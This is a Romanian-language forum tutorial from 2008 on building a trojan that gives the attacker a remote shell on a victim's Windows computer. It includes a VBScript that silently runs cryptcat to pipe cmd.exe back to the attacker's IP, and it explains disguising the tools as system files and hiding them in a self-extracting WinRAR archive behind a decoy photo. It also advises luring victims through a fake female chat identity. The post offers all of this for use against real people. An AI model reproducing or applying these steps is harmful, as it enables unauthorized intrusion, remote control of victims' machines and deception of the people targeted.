!!!atentie!!! - probabil gasiti acelasi post pe un alt forum (coincide tot cuv. cu cuv.) ... asta e pt ca acolo tot eu l-am postat
in tutorialul asta o sa explic cum sa troienizati , cu obiectivul final de a obtine un shell in sistemul victimei .
material necesar :
1.-Cryptcat
2.-Winrar
3.-Nircmd
4.- un joc flash , sau poze ... sau ce va vine in minte pt ca victima sa "pice"
5.- un mic script
link download cryptcat si nircmd :
http://rapidshare.com/files/152664875/pt_sdh_by_d.s.s.h..rar.htmlceva info de cryptcat gasiti aici
http://www.datastronghold.com/articles/3.html (sunt explicatii pt netcat , insa cryptcat e o versiune de netcat ... deci comenzile sunt valabile pt amandoua tooluri)
acum la treaba
!! in tutorial eu o sa folosesc o poza
in notepad puneti urmatorul script :
set cmd = createobject("wscript.shell")
Set shell = CreateObject("Scripting.FileSystemObject")
dta=" @echo off"&vbcrlf& _
"%c:\windows\system32%"&vbcrlf& _
"run32dll.exe ipulvostru 21 |cmd.exe| run32dll.exe ipulvostru 25"""
set b=shell.CreateTextFile("w.bat")
b.close
set d=shell.OpenTextFile("w.bat",2)
d.write dta
d.close
cmd.run "w.bat", vbHide
asigurativa ca inlocuiti "ipulvostru" cu ipul real ... (in caz ca nu va stiti ipul - start-run-cmd -scrieti ipconfig dati enter si va da ipul ) , si salvati scriptul cu numele inetcpe.vbs
acum mutati cryptcat , nircmd , scriptul pe care l-am facut inainte si fotografia intr-un folder , si redenumitile astfel :
cryptcat = run32dll
nircmd=igfxdll
script=inetcpe
foto=photo0078
acum aveti tot ce e necesar ... sa trecem la arhivare .
selectati toate 4 fisiere din folder , dati click dreapta si add to arhive ...
va apare fereastra cu optiunile de arhivare ... configurati astfel :
-archiving options : delete files after archiving si create sfx archive
-compression mode : best
din optiunile de sus ... dati click pe advanced si configurati apoi pe SFX options , si unde zice path to extract puneti c:\widows\system32 (asta e pt ca fisierele sa se extraga in system 32) , si unde pune Run after extraction puneti orice ... (ex : orice ) ; apoi mergeti la modes si bifati hide all si skip existing files .dati accept.mergeti la comment si modificati astfel :
Path=c\windows\system32
Setup=inetcpe.vbs
Setup=photo0078.jpg
Silent=1
Overwrite=2
dati accept ... si aveti creat troianul vostru cheers
schimbati numele arhivei in ceva care sa se potriveasca cu "capcana" ... in cazul asta am folosit o poza ... deci se poate numi poze arhiva ... daca folositi altceva ... schimbati numele , si schimbati tot ce e relationat cu poza in asa fel incat sa fie relationat cu ce ati pus voi in arhiva (un joc flash , un filmulet , un video , un yahoo password cracker etc)
acum gasiti o victima si datii arhiva ... (pt practica va puteti faceti un id de fata ... si sa luati idul unui ****** , sa faceti practica pe ei ... ca daca e vb de fete , unii obisnuiesc sa puna botul la orice)
acum deschideti cryptcat si scrieti -vvlp 21
deschideti inca o fereastra cu cryptcat si puneti -vvlp 25
si odata ce victima deschide arhiva ... obtinem shellul si avem sistemul victimei la picioarele noastre
cheers
odata ce ati obtinut shellul , comenzile se scriu in fereastra in care am pus -vvlp 21 si rezultatele apar in fereastra cu -vvlp 25 . (daca nu stiti comenzile ... cititi mini-tutorialul de cmd) ...
sper sa va fie de folos , si sa nu aveti probleme ... e tot destul de usor de facut ...
D.S.S.H.
salut
Subiect: patrundere in sistem 
Vin Dec 19, 2008 11:25 pm